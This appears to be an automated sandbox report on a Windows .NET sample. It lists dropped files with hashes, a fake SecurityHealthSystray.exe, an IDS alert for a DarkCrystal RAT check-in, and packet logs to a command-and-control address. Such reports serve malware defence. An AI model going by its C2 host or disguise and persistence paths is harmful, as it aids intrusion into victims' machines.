                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\yZwGwFNU.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):64000
                                          Entropy (8bit):5.857602289000348
                                          Encrypted:false
                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\zXYOSFcP.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.629584586954759
                                          Encrypted:false
                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\zmagdNkm.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):126976
                                          Entropy (8bit):6.057993947082715
                                          Encrypted:false
                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):55
                                          Entropy (8bit):4.306461250274409
                                          Encrypted:false
                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                          Malicious:false
                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                          C:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP

                                          Download File
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          File Type:MSVC .res
                                          Category:dropped
                                          Size (bytes):1224
                                          Entropy (8bit):4.435108676655666
                                          Encrypted:false
                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                          Malicious:false
                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                          C:\Windows\System32\SecurityHealthSystray.exe

                                          Download File
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):4608
                                          Entropy (8bit):3.967394647896059
                                          Encrypted:false
                                          SSDEEP:48:6bpIaPt32M7Jt8Bs3FJsdcV4MKe27uksrqS0mvqBHyOulajfqXSfbNtm:3aPVPc+Vx9Mu1BvkccjRzNt
                                          MD5:7C3C91E610B460C5F5D5E14D15564E80
                                          SHA1:7D827BD004A10E755AA239B1B434F5896D4F87A0
                                          SHA-256:4F7DC2183564D2087FCA596CE5D0A32197D7365290A8F95A58776E2F9593BB88
                                          SHA-512:C153DA774B41AAEF45508BE3389E0C4F43C880CF1684FA0A95AAA94454EF3A2BBEC7B0D288ED6815AAFC1902D99569E7871AB168C071D5C417B144582DF4E4EC
                                          Malicious:true
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..f.............................'... ...@....@.. ....................................@.................................h'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..@.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID... ... ...#Blob...........WU........%3................................................................

                                          \Device\Null

                                          Download File
                                          Process:C:\Windows\System32\w32tm.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):151
                                          Entropy (8bit):4.852327883076639
                                          Encrypted:false
                                          SSDEEP:3:VLV993J+miJWEoJ8FXKp6UTfLRvoTCqLAHKvj:Vx993DEU16KfLG2HM
                                          MD5:AF82123D2A9868A9D39F3121AC90AC1F
                                          SHA1:A102D389888B621EA13539E9B67EA18D2B5EE2A2
                                          SHA-256:DAFB94A9D496EB309F8365FE9E656220B5E13A2B5900F6CF359F146F177C1AF5
                                          SHA-512:2AD08AE1E3392ACD642577F6564055FC88C4613A09C55DFE3B86103D5DA9700A40BF6C7F91A5EE56E84CC723AAB0E6D5BC38C6FA0097B8016418EAE5D9645E3D
                                          Malicious:false
                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/09/2024 16:27:25..16:27:25, error: 0x80072746.16:27:30, error: 0x80072746.

                                          Static File Info

                                          General

                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Entropy (8bit):7.993950820060533
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:84JufgBTrA.exe
                                          File size:3'511'394 bytes
                                          MD5:3c9cf0b38226e2a7f0191a0130536859
                                          SHA1:87d531257a15e18b50fa341bce9ac3c5a71ba80d
                                          SHA256:4ac2ddb4fa2d1917ae491b5ac623e7ebf23e5e34667c63e5acd433cc6696c23d
                                          SHA512:ad6bc0c26b6adbb7ead5db17fb4fd4285bcfd623531f41ad6ae31e97a1e760a59f36de05eab0e298e0892fea03d4a4c2ae389d90036c784edb44e61d7a8161d2
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          TLSH:2CF533C098C0BAC1ECB3EC75869D46E521EA85B715931E7EB23B7F9BC47E2011D486B1
                                          File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`.............................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x402e5e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x370.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xe640x1000504217ba641b2f774b5f055155b16ba3False0.5498046875data5.288143571494792IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x40000x3700x40084c5330df637369dd4da3d84a91b8d66False0.3759765625data2.854832632722979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x60000xc0x2003e52e1078a0b59d6e1786202443d2efeFalse0.99609375data6.4705117449791265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x40580x318data0.44823232323232326

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-13T21:02:22.831881+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973431.177.108.21180TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 13, 2024 21:02:21.981327057 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:21.986401081 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:21.986495018 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:21.987354994 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:21.993495941 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:22.346550941 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:22.352668047 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:22.732584000 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:22.831881046 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:22.995029926 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:22.995266914 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:22.995343924 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.084028006 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.238140106 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.377672911 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.382550955 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.506814003 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.512396097 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.512516022 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.512667894 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.517539978 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.637963057 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.638237000 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.643544912 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.863250017 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.868505001 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.868541002 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.868587971 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.883778095 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:23.884469032 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:23.889569998 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.125427008 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.125612974 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.130485058 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.269428015 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.354147911 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.370389938 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.371040106 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.375955105 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.404721022 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.482187033 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.600269079 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.600635052 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.605743885 CEST804973631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.605823994 CEST4973680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.606344938 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.606450081 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.606585026 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.609940052 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.610234022 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.611474037 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.615431070 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.615459919 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.957412004 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:24.962588072 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.962619066 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:24.962645054 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:25.050076008 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:25.238152027 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:25.376363039 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:25.425651073 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:25.533644915 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:25.697021961 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.658921003 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.659066916 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.662475109 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.664253950 CEST804973431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:26.664326906 CEST4973480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.664812088 CEST805666531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:26.664875984 CEST5666580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.667359114 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:26.667578936 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.667722940 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:26.672569036 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.019741058 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.025052071 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.025227070 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.025254965 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.420001984 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.485663891 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.573883057 CEST805666631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.628797054 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.719409943 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.724555016 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:27.724827051 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.724827051 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:27.729758024 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.100060940 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:28.124905109 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.125329971 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.125638008 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.496382952 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.627744913 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:28.627810955 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:29.766541004 CEST5666680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.069041014 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.074234962 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.074328899 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.074440956 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.078433037 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.079648018 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.083776951 CEST805666731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.083851099 CEST5666780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.425770998 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:30.430912971 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.430944920 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.837603092 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:30.972570896 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.002846956 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:31.160051107 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.712924957 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.713148117 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.720326900 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:31.720385075 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.720515013 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:31.727128029 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:31.732822895 CEST805667031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:31.732878923 CEST5667080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.066375017 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.221116066 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.221415997 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.221771002 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.462976933 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.535039902 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.592562914 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.722546101 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.845046043 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.845339060 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.850322008 CEST805667131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.850337982 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:32.850380898 CEST5667180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.850446939 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.850545883 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:32.855619907 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.207084894 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:33.212114096 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.212179899 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.212189913 CEST805667331.177.108.211192.168.2.4
